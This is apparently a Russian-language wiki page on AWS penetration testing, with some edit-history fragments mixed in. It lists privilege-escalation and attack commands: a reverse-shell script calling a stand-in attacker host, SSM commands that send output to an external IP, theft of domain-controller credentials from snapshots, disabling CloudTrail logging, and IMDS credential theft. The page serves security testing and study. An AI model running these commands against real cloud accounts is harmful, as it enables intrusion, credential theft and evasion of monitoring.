aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE --availability-zone us-east-1d --instance-os-user ubuntu --ssh-public-key file://shortkey.pub --profile uploadcreds</syntaxhighlight>

==== ec2-instance-connect:SendSerialConsoleSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

В отличие от предыдущего пункта, этот ключ можно использовать только при подключении EC2 Serial Console.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-serial-console-ssh-public-key --instance-id i-001234a4bf70dec41EXAMPLE --serial-port 0 --ssh-public-key file://my_key.pub --region us-east-1

# Подключаемся (кроме GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-east-1.aws
# Подключаемся (только для GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-gov-east-1.amazonaws.com

# В некоторых случаях нужно подключиться к EC2 и перезагрузить сервис getty (лучше пробовать только, когда не смогли подключиться)
sudo systemctl restart serial-getty@ttyS0
# Если не сработало - мб требуется ребутать сервер.
</syntaxhighlight>

Также можно подключиться, используя браузер. Подробнее тут: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/connect-to-serial-console.html

==== ssm:SendCommand ====

Позволяет запускать команды в EC2-Instances. Если нет дополнительных прав, то потребуется:

* Знать Instance-ID, на котором запущен сервис SSM

* Свой сервер, на который будет приходить отстук - результат команды.

Команды для эксплуатации:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию о SSM сервисах - может потребоваться ssm:DescribeInstanceInformation
aws ssm describe-instance-information --profile stolencreds --region eu-west-1
# Выполняем команду
aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
# Получаем результат команды(может не хватить прав ssm:ListCommandInvocations)
aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds

# Пример - результат команды на удаленный сервер
$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1
</syntaxhighlight>

==== EC2:CreateSnapshot + Active Directory ====

См. AD.

== Auto Scaling (autoscaling) ==

Сервис для масштабирования приложений. Работает преимущественно с EC2, ECS, DynamoDB (таблицы и индексы) и Aurora.

Для работы сервиса требуется:

1. Конфигурация запуска EC2.

2. Конфигурация масштабирования.

== Роли - повышение привилегий ==

=== autoscaling:CreateLaunchConfiguration + autoscaling:Create(Update)AutoScalingGroup + iam:PassRole ===

Позволяет создать и запустить конфигурацию масштабирования.

==== Создаем конфигурацию запуска EC2 ====

Для создания требуется:

1. Image-id

2. iam-instance-profile

Следующая команда создает конфигурацию с командой из файла reverse-shell.sh:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-launch-configuration --launch-configuration-name demo3-LC --image-id ami-0f90b6b11936e1083 --instance-type t1.micro --iam-instance-profile demo-EC2Admin --metadata-options "HttpEndpoint=enabled,HttpTokens=optional" --associate-public-ip-address --user-data=file://reverse-shell.sh
</syntaxhighlight>

Пример содержимого reverse-shell.sh:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
#!/bin/bash
/bin/bash -l > /dev/tcp/atk.attacker.xyz/443 0<&1 2>&1
</syntaxhighlight>

==== Создаем и запускаем группу масштабируемости ====

Привилегия ec2:DescribeSubnets нужна для выбора нужной сети (чтобы EC2 смог сделать reverse-соедиенение к нам).

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-auto-scaling-group --auto-scaling-group-name demo3-ASG --launch-configuration-name demo3-LC --min-size 1 --max-size 1 --vpc-zone-identifier "subnet-aaaabbb"
</syntaxhighlight>

Подробнее тут https://notdodo.medium.com/aws-ec2-auto-scaling-privilege-escalation-d518f8e7f91b

== AD (Directory Service) ==

Второе название - AWS Managed Microsoft Active Directory. Позволяет использовать Active Directory в AWS.

Основные понятия:

* EC2-Instance - VPS на которых крутится весь Active Directory

=== Роли - повышение привилегий ===

==== EC2:CreateSnapshot + EC2:RunInstance -> ShadowCopy ====

Позволяет провести атаку ShadowCopy на доменный контроллер и считать учетные данные всех пользователей.

Последовательность атаки:

1. Получаем список инстансов

2. Создаем Snapshot выбранного сервера

3. Редактируем атрибуты у SnapShot для доступа с аккаунта атакующего.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 modify-snapshot-attribute --snapshot-id snap-1234567890abcdef0 --attribute createVolumePermission --operation-type remove --user-ids 123456789012
</syntaxhighlight>

4. Переключаемся на аккаунт атакующего

5. Создаем новый Linux EC2-инстанс, к которому будет прикреплен SnapShot

6. Подключаемся по SSH и получаем данные из SnapShot
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sudo -s
mkdir /tmp/windows
mount /dev/xvdf1 /tmp/windows/
cd /tmp/windows/
</syntaxhighlight>

7. Работаем с данными на примонтированном диске, который будет в /tmp/windows/. Пример команд для извлечения ntds.dit:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
cp /windows/Windows/NTDS/ntds.dit /home/ec2-user
cp /windows/Windows/System32/config/SYSTEM /home/ec2-user
chown ec2-user:ec2-user /home/ec2-user/*
# Sftp - скачиваем файлы:
/home/ec2-user/SYSTEM
/home/ec2-user/ntds.dit
# Получаем учетные данные, используя Impacket-secretsdump
secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets
</syntaxhighlight>

== CloudTrail ==

Сервис для аудита событий в AWS-аккаунте (включен в каждом аккаунте по-умолчанию). Сервис позволяет вести журналы, осуществлять непрерывный мониторинг и сохранять информацию об истории аккаунта в пределах всей используемой инфраструктуры AWS.

Записывает:

* API-вызовы

* Логины в систему

* События сервисов

* ???

Важен при операциях RedTeam.

Название файла логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
AccountID_CloudTrail_RegionName_YYYYMMDDTHHmmZ_UniqueString.FileNameFormat
</syntaxhighlight>

S3 путь до логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
BucketName/prefix/AWSLogs/AccountID/CloudTrail/RegionName/YYYY/MM/DD
</syntaxhighlight>

Путь у CloudTrail-Digest файлов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
s3://s3-bucket-name/optional-prefix/AWSLogs/aws-account-id/CloudTrail-Digest/region/digest-end-year/digest-end-month/digest-end-data/aws-account-id_CloudTrail-Digest_region_trail-name_region_digest_end_timestamp.json.gz
</syntaxhighlight>

Основные поля у событий:

* eventName - имя API-endpoint

* eventSource - вызванный сервис

* eventTime - время события

* SourceIPAddress - ip-адрес источника

* userAgent - метод запроса
** "signing.amazonaws.com" - запрос от AWS Management Console
** "console.amazonaws.com" - запрос от root-пользователя аккаунта
** "lambda.amazonaws.com" - запрос от AWS Lambda

* requestParameters - параметры запроса

* responseElements - элементы ответа.

Временные параметры:

* 5 минут - сохраняется новый лог-файл

* 15 минут - сохраняется в S3.

Важно! Сохраняется чексумма файлов, поэтому пользователи могут удостовериться что логи не менялись.
Также логи могут уходить напрямую в CloudWatch - администраторам может прилететь уведомление об ИБ-инцидентах. Или события могут быть проанализированы внутренним модулем CloudTrail - Insights на предмет необычной активности.

=== Роли - управление ===

==== cloudtrail:DeleteTrail ====

Позволяет отключить мониторинг:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail delete-trail --name cloudgoat_trail --profile administrator
</syntaxhighlight>

==== cloudtrail:UpdateTrail ====

Права на редактирование правил монитринга.

Отключить мониторинг глобальных сервисов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event
</syntaxhighlight>

Отключить мониторинг на конкретные регионы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west
</syntaxhighlight>

==== validate-logs ====

Проверить, были ли изменены логи.

aws cloudtrail validate-logs --trail-arn <trailARN> --start-time <start-time> [--end-time <end-time>] [--s3-bucket <bucket-name>] [--s3-prefix <prefix>] [--verbose]

=== Эксплуатация ===

==== Обход правила по UserAgent ====

На сервисе есть правило, по которому определяет, что запросы были сделаны с kali/parrot/pentoo используя awscli.

Для этого можно воспользоваться утилитой pacu, которая автоматически подменяет useragent. Использование утилиты в конце статьи.

== DynamoDB ==

Cистема управления базами данных класса NoSQL в формате «ключ — значение».

=== Роли - управление ===

==== dynamodb:ListTables ====

Позволяет посмотреть спрсок таблиц базы данных.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb list-tables

{
"TableNames": [
"users"
]
}
</syntaxhighlight>

==== dynamodb:Scan ====

Получение обьектов из базы данных:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users | jq -r '.Items[]'

{
"password": {
"S": "Management@#1@#"
},
"username": {
"S": "Mgmt"
}
}
</syntaxhighlight>

== ES (ElasticSearch) ==

ElasticSearch от AWS. Используется для просмотра логов/журналов, поиска на вебсайте и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.es.amazonaws.com
</syntaxhighlight>

== ELB (Elastic Load Balancing) ==

Балансировщик нагрузки.

Формат ссылки (elb_v1):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443
</syntaxhighlight>

Формат ссылки (elb_v2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.elb.amazonaws.com
</syntaxhighlight>

== RDS (Relational Database Service) ==

Облачная реляционная база данных (на выбор).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306
postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432
</syntaxhighlight>

== Route 53 ==

Настраиваемая служба DNS.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
{user_provided}
</syntaxhighlight>

== API Gateway ==

API-сервис, который будет доступен почти со всех серверов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{restapi_id}.execute-api.{region}.amazonaws.com/{stage_name}/
https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided}
</syntaxhighlight>

== CloudSearch ==

Альтернатива сервису ElasticSearch. Система для упрощения поиска для администрирования и, например, на вебсайте.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://doc-{user_provided}-{random_id}.{region}.cloudsearch.amazonaws.com
</syntaxhighlight>

== Transfer Family ==

Группа сервисов для передачи файлов (S3/EFS) по (SFTP, FTPS, FTP).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sftp://s-{random_id}.server.transfer.{region}.amazonaws.com
ftps://s-{random_id}.server.transfer.{region}.amazonaws.com
ftp://s-{random_id}.server.transfer.{region}.amazonaws.com
</syntaxhighlight>

== IoT (Internet Of Things) ==

Сервис для управления IoT-устройствами.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mqtt://{random_id}.iot.{region}.amazonaws.com:8883
https://{random_id}.iot.{region}.amazonaws.com:8443
https://{random_id}.iot.{region}.amazonaws.com:443
</syntaxhighlight>

== MQ ==

Сервис брокера сообщений для Apache ActiveMQ & RabbitMQ.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162
ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617
</syntaxhighlight>

== MSK (Managed Streaming for Apache Kafka) ==

Сервис потоковой передачи данных в Apache Kafka.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com
{user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com
</syntaxhighlight>

== Cloud9 ==

Облачная интегрированная среда разработки(IDE) используя только браузер.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.vfs.cloud9.{region}.amazonaws.com
</syntaxhighlight>

== MediaStore ==

Cервис хранилища AWS, оптимизированный для мультимедийных материалов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.data.mediastore.{region}.amazonaws.com
</syntaxhighlight>

== Kinesis Video Streams ==

Обеспечивает простую и безопасную потоковую передачу видео с подключенных устройств в AWS для воспроизведения, аналитики, машинного обучения (ML) и других видов обработки.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.kinesisvideo.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaConvert ==

Сервис перекодирования видеофайлов с возможностями на уровне вещательных компаний. Он позволяет просто создавать контент в формате «видео по требованию» (VOD) для трансляций, в том числе мультиэкранных, в любом масштабе.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediaconvert.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaPackage ==

Cервис для подготовки и защиты видеоконтента, распространяемого через Интернет. AWS Elemental MediaPackage использует один источник видео и создает на его основе специализированные видеопотоки для воспроизведения на подключенных телевизорах, мобильных телефонах, компьютерах, планшетах и игровых консолях.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel
</syntaxhighlight>

== ECR (Elastic Container Registry) ==

Региональный сервис, предназначенный для обеспечения гибкого развертывания образов.

=== Роли - управление ===

==== ecr:ListImages ====

Получить список образов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr list-images --repository-name <ECR_name> --registry-id <UserID> --region <region> --profile <profile_name>
</syntaxhighlight>

==== ecr:GetDownloadUrlForLayer ====

Позволяет получить URL на скачивание образа.

==== ecr:GetDownloadUrlForLayer + ecr:BatchGetImage + ecr:GetAuthorizationToken ====

Позволяет скачать образ (мб потребуется и ecr:ListImages чтобы получить список образов):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr get-login
docker pull <UserID>.dkr.ecr.us-east-1.amazonaws.com/<ECRName>:latest
docker inspect sha256:079aee8a89950717cdccd15b8f17c80e9bc4421a855fcdc120e1c534e4c102e0
</syntaxhighlight>

== Augmented AI (Amazon A2I) ==

Предоставляет интерфейс для обработки человеком предварительных результатов, полученных с помощью машинного обучения.

[[File:A2i.png|1000px]]

Данные сохраняются в S3, а также к задаче прикрепляется IAM-роль .

При создании задачи разделяется на 3 варианта:

* Textract - извлечение пары ключ-значение из текста

* Rekognition - определение того, что изображено на фото. Например, чтобы оградить от 18+ контента.

* Custom - пользовательский вариант

Интересный факт - использует "Quill Rich Text Editor" для текста с инструкциями. То есть, если в нем будет уязвимость, то можно проверить амазон тоже.

https://aws.amazon.com/ru/augmented-ai/

Также у сервиса есть Workers - сервера, выполняющие кучу тасков. Они могут быть трех типов:

1. Amazon Mechanical Turk - тупо сервера Amazon, за которые надо платить.

2. Private - юзают если обрабатывают приватную инфу или задачи, не поддерживаемые первым пунктом (ну или регион не поддерживается). Это команды, которые имеют доступ к данным и которые могут запускать задачи. Команды менеджарятся с Amazon Cognito.

3. Vendor - решения сторонних разработчиков.

=== Роли ===

==== AmazonAugmentedAIIntegratedAPIAccess ====

Дает доступ к Augmented AI Runtime, Amazon Rekognition или Amazon Textract API.

TODO: проверить, дает ли это еще возможностей злоумышленнику

== CodeGuru ==

Автоматизируйте проверку кода и оптимизируйте производительность приложений с помощью рекомендаций на базе машинного обучения

[[File:Aws codeguru.png| 1000px]]

https://aws.amazon.com/ru/codeguru/

Разделяется на следующие части:

- Reviewer - выявляет критические проблемы, уязвимости системы безопасности и трудноуловимые ошибки + дает рекомендации (языки Java и Python) - статикой.

- Profiler - выявление самых дорогостоящих строк, повышение производительности и тд засчет запуска в среде выполнения. Важно особенно для тех, кто платит за время работы скриптов.

Также на странице есть упоминание про их игру - BugBust

https://us-east-1.console.aws.amazon.com/codeguru/bugbust/participant#/

== Comprehend ==

https://aws.amazon.com/ru/comprehend/

== DevOps Guru ==

https://aws.amazon.com/ru/devops-guru/

== Elastic Inference ==

https://aws.amazon.com/machine-learning/elastic-inference/

== Forecast ==

https://aws.amazon.com/ru/forecast/

== Fraud Detector ==

https://aws.amazon.com/ru/fraud-detector/

== HealthLake ==

https://aws.amazon.com/healthlake/

== Kendra ==

https://aws.amazon.com/kendra/?did=ap_card&trk=ap_card

== Lex ==

https://aws.amazon.com/lex/?did=ap_card&trk=ap_card

== Lookout for Equipment ==

https://aws.amazon.com/ru/lookout-for-equipment/

== Lookout for Metrics ==

https://aws.amazon.com/lookout-for-metrics/

== Lookout for Vision ==

https://aws.amazon.com/lookout-for-vision/

== Monitron ==

https://aws.amazon.com/monitron/

== Personalize ==

https://aws.amazon.com/personalize/

== Polly ==

https://aws.amazon.com/polly/

== Rekognition ==

https://aws.amazon.com/rekognition/

== SageMaker ==

https://aws.amazon.com/sagemaker/

== SageMaker Ground Truth ==

https://aws.amazon.com/sagemaker/groundtruth/

== Textract ==

https://aws.amazon.com/textract/

== Transcribe ==

https://aws.amazon.com/transcribe/

== Translate ==

https://aws.amazon.com/translate/

== Apache MXNet ==

https://aws.amazon.com/ru/mxnet/

== Deep Learning Containers ==

https://aws.amazon.com/machine-learning/containers/

== DeepComposer ==

https://aws.amazon.com/deepcomposer/

== DeepLens ==

https://aws.amazon.com/deeplens/

== DeepRacer ==

https://aws.amazon.com/deepracer/

== Inferentia ==

https://aws.amazon.com/machine-learning/inferentia/

== Panorama ==

https://aws.amazon.com/panorama/

== PyTorch ==

https://aws.amazon.com/pytorch/

== TensorFlow ==

https://aws.amazon.com/tensorflow/

== Deep Learning AMI ==

https://aws.amazon.com/machine-learning/amis/

= Утилиты =

== Вычисление ролей ==

=== enumerate-iam ===
github.com:andresriancho/enumerate-iam.git

== Эксплуатация ==

=== Golden SAML ===

Суть атаки в том, что зная ключ, которым подписываются SAML-запросы, вы можете подделать ответ и получить произвольные привилегии в SSO.

Подробнее про эксплуатацию тут: https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps

==== shimit ====
https://github.com/cyberark/shimit

Установка:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
cd /tmp
python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml
git clone https://github.com/cyberark/shimit
cd shmit
python shmit.py
</syntaxhighlight>

В начале потребуется доступ к AD FS аккаунту из персонального хранилища которого украсть приватный ключ ключ.
Сделать это можно используя mimikatz, но в примере сделано через библиотеку Microsoft.Adfs.Powershell и powershell

Пример эксплуатации:
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:auto" >
# Получаем приватный ключ
[System.Convert]::ToBase64String($cer.rawdata)
(Get-ADFSProperties).Identifier.AbsoluteUri
(Get-ADFSRelyingPartyTrust).IssuanceTransformRule

# Получаем инфу о юзерах - выбираем цель
aws iam list-users

# Получаем токен
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012

# Проверяем текущий аккаунт
aws opsworks describe-my-user-profile
</syntaxhighlight>

== Проверки безопасности ==

Для администраторов преимущественно.

=== Zeus ===

https://github.com/DenizParlak/Zeus

== Другое ==

=== aws_consoler ===

https://github.com/NetSPI/aws_consoler

== All-In-One ==

=== pacu ===

https://github.com/RhinoSecurityLabs/pacu

=== ScoutSuite ===

https://github.com/nccgroup/ScoutSuite

=== cloudfox ===

https://github.com/BishopFox/cloudfox

= Ссылки =

== Статьи ==

[https://frichetten.com/blog/hijack-iam-roles-and-avoid-detection/ Hijacking IAM Roles and Avoiding Detection]

[https://frichetten.com/blog/bypass-guardduty-pentest-alerts/ Bypass GuardDuty PenTest Alerts]

[https://frichetten.com/blog/ssm-agent-tomfoolery/ Intercept SSM Agent Communications]

== Лаборатории ==

[https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6 Damn Vulnerable Cloud Application]

[https://github.com/nccgroup/sadcloud SadCloud]

[http://flaws.cloud Flaws]

[http://flaws2.cloud/ Flaws]

[https://xakep.ru/2022/03/21/htb-stacked/ HackTheBox Stacked Writeup]

[https://github.com/RhinoSecurityLabs/cloudgoat CloudGoat]

[https://github.com/nccgroup/sadcloud SadCloud]

[https://www.wellarchitectedlabs.com/security/ AWS Well-Architected Labs]

[https://labs.withsecure.com/publications/attack-detection-fundamentals-2021-aws-lab-1 Attack Detection Fundamentals 2021: AWS - Lab #1]

[https://pentesting.cloud/ Free AWS Security Labs]

== Краткие заметки ==

[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest.md PayloadAllTheThings]

[https://book.hacktricks.xyz/pentesting/pentesting-web/buckets/aws-s3 hacktricks-s3]

[https://book.hacktricks.xyz/cloud-security/aws-security hacktricks-aws]

[https://learntocloud.guide/#/phase5/README learntocloud(много ссылок)]

== Книги ==

[https://www.amazon.com/dp/1789136725/ Hands-On AWS Penetration Testing with Kali Linux]

Файл:Aws codeguru.png

2022-10-17T11:03:37Z

Drakylar:

Aws

2022-10-17T10:53:50Z

Drakylar: /* Augmented AI (Amazon A2I) */

AWS - Amazon Web Service. Одна из первых облачных систем, состоящая из многих сервисов, которые при некорректной настройке оставляют дыры в безопасности.

= Организационные моменты =

При проведении тестирования на проникновение, требуется предупредить AWS (составить заявку).

Подробнее тут: https://aws.amazon.com/ru/security/penetration-testing/

= Общие концепции =

== Службы ==

Концепция служб в AWS позволяет автоматизировать многие процессы, включая саму разработку архитектуры.

Это экосистема многих сервисов. И AWS стремится увеличить их количество.

Например, связать сервис сбора логов и сервис по реагированию на инциденты, а результаты класть на сервис S3.

== Регионы ==

AWS разделен на регионы. Часть сервисов кросс-региональные, но большинство привязываются к конкретным регионам.

{| class="wikitable"
|+Регионы AWS
|-
| '''Название региона'''
| '''Endpoint(HTTPS)'''
|-
|us-east-2
|rds.us-east-2.amazonaws.com

rds-fips.us-east-2.api.aws

rds.us-east-2.api.aws

rds-fips.us-east-2.amazonaws.com
|-
|us-east-1
|rds.us-east-1.amazonaws.com

rds-fips.us-east-1.api.aws

rds-fips.us-east-1.amazonaws.com

rds.us-east-1.api.aws
|-
|us-west-1
|rds.us-west-1.amazonaws.com

rds.us-west-1.api.aws

rds-fips.us-west-1.amazonaws.com

rds-fips.us-west-1.api.aws
|-
|us-west-2
|rds.us-west-2.amazonaws.com

rds-fips.us-west-2.amazonaws.com

rds.us-west-2.api.aws

rds-fips.us-west-2.api.aws
|-
|af-south-1
|rds.af-south-1.amazonaws.com

rds.af-south-1.api.aws
|-
|ap-east-1
|rds.ap-east-1.amazonaws.com

rds.ap-east-1.api.aws
|-
|ap-southeast-3
|rds.ap-southeast-3.amazonaws.com
|-
|ap-south-1
|rds.ap-south-1.amazonaws.com

rds.ap-south-1.api.aws
|-
|ap-northeast-3
|rds.ap-northeast-3.amazonaws.com

rds.ap-northeast-3.api.aws
|-
|ap-northeast-2
|rds.ap-northeast-2.amazonaws.com

rds.ap-northeast-2.api.aws
|-
|ap-southeast-1
|rds.ap-southeast-1.amazonaws.com

rds.ap-southeast-1.api.aws
|-
|ap-southeast-2
|rds.ap-southeast-2.amazonaws.com

rds.ap-southeast-2.api.aws
|-
|ap-northeast-1
|rds.ap-northeast-1.amazonaws.com

rds.ap-northeast-1.api.aws
|-
|ca-central-1
|rds.ca-central-1.amazonaws.com

rds.ca-central-1.api.aws

rds-fips.ca-central-1.api.aws

rds-fips.ca-central-1.amazonaws.com
|-
|eu-central-1
|rds.eu-central-1.amazonaws.com

rds.eu-central-1.api.aws
|-
|eu-west-1
|rds.eu-west-1.amazonaws.com

rds.eu-west-1.api.aws
|-
|eu-west-2
|rds.eu-west-2.amazonaws.com

rds.eu-west-2.api.aws
|-
|eu-south-1
|rds.eu-south-1.amazonaws.com

rds.eu-south-1.api.aws
|-
|eu-west-3
|rds.eu-west-3.amazonaws.com

rds.eu-west-3.api.aws
|-
|eu-north-1
|rds.eu-north-1.amazonaws.com

rds.eu-north-1.api.aws
|-
|me-south-1
|rds.me-south-1.amazonaws.com

rds.me-south-1.api.aws
|-
|sa-east-1
|rds.sa-east-1.amazonaws.com

rds.sa-east-1.api.aws
|-
|us-gov-east-1
|rds.us-gov-east-1.amazonaws.com
|-
|us-gov-west-1
|rds.us-gov-west-1.amazonaws.com
|}

Или только регионы (могут пригодиться при переборе):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
us-east-2
us-east-1
us-west-1
us-west-2
af-south-1
ap-east-1
ap-southeast-3
ap-south-1
ap-northeast-3
ap-northeast-2
ap-southeast-1
ap-southeast-2
ap-northeast-1
ca-central-1
eu-central-1
eu-west-1
eu-west-2
eu-south-1
eu-west-3
eu-north-1
me-south-1
sa-east-1
us-gov-east-1
us-gov-west-1
</syntaxhighlight>

== Доступы ==

== Консольная утилита(awscli) ==

Чаще всего для взаимодействия с сервисами AWS вам потребуется консольная утилита awscli.

Утилита работает с настроенными профилями.

=== Файлы ===

==== ~/.aws/credentials ====

Файл с учетными данными профилей. Перефразирую: получив данные из этого файла вы, вероятнее всего, получите контроль над аккаунтами в нем.

У каждого профиля будет указан:

* Access Key ID - 20 случайных букв/цифр в верхнем регистре, часто начинается с "AKIA..."

* Access Key - 40 случайных символов различного регистра.

* Access Token - не всегда указывается

Полный список параметров можно посмотреть тут: https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-files.html#cli-configure-files-settings

Пример содержимого файла (сохранен профиль default):

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
aws_access_key_id=AKIAIOSFODNN7EXAMPLE
aws_secret_access_key=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
aws_session_token = AQoEXAMPLEH4aoAH0gNCAPyJxz4BlCFFxWNE1OPTgk5TthT+FvwqnKwRcOIfrRh3c/LTo6UDdyJwOOvEVPvLXCrrrUtdnniCEXAMPLE/IvU1dYUg2RVAJBanLiHb4IgRmpRV3zrkuWJOgQs8IZZaIv2BXIa2R4Olgk
</syntaxhighlight>

==== ~/.aws/config ====

Файл с региональными настройками профиля(регион по-умолчанию).
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
region=us-west-2
output=json
</syntaxhighlight>

==== ~/.aws/cli/cache ====

Закешированные учетные данные

==== ~/.aws/sso/cache ====

Закешированные данные Single-Sign-On

=== Команды ===

Общее построение команды выглядит как:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws <название_сервиса> <действие> <дополнительные_аргументы>
</syntaxhighlight>

Примеры:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Вывести все S3-хранилища.
aws s3 ls

# Создание нового пользователя - сервис IAM
aws iam create-user --user-name aws-admin2
</syntaxhighlight>

== IMDS (Instance Metadata Service) ==

Это http API для запросов из EC2. Полезно если, например, у вас есть уязвимость SSRF в EC2.

Есть 2 версии:

*IMDSv1 - версия 1 по-умолчанию, не требует токен.

*IMDSv2 - версия 2, для запросов требуется токен.

Запрос без токена:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
curl http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Запрос с токеном:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` && curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Кроме доп. информации можно получить access-token для доступа в AWS с сервисного аккаунта ec2 (только для IMDSv2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# В начале делаем запрос на директорию /security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Потом выбираем нужный аккаунт и делаем запрос на него
http://169.254.169.254/latest/meta-data/iam/security-credentials/test-account
</syntaxhighlight>

Пример ответа:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Code" : "Success",
"LastUpdated" : "2019-12-03T07:15:34Z",
"Type" : "AWS-HMAC",
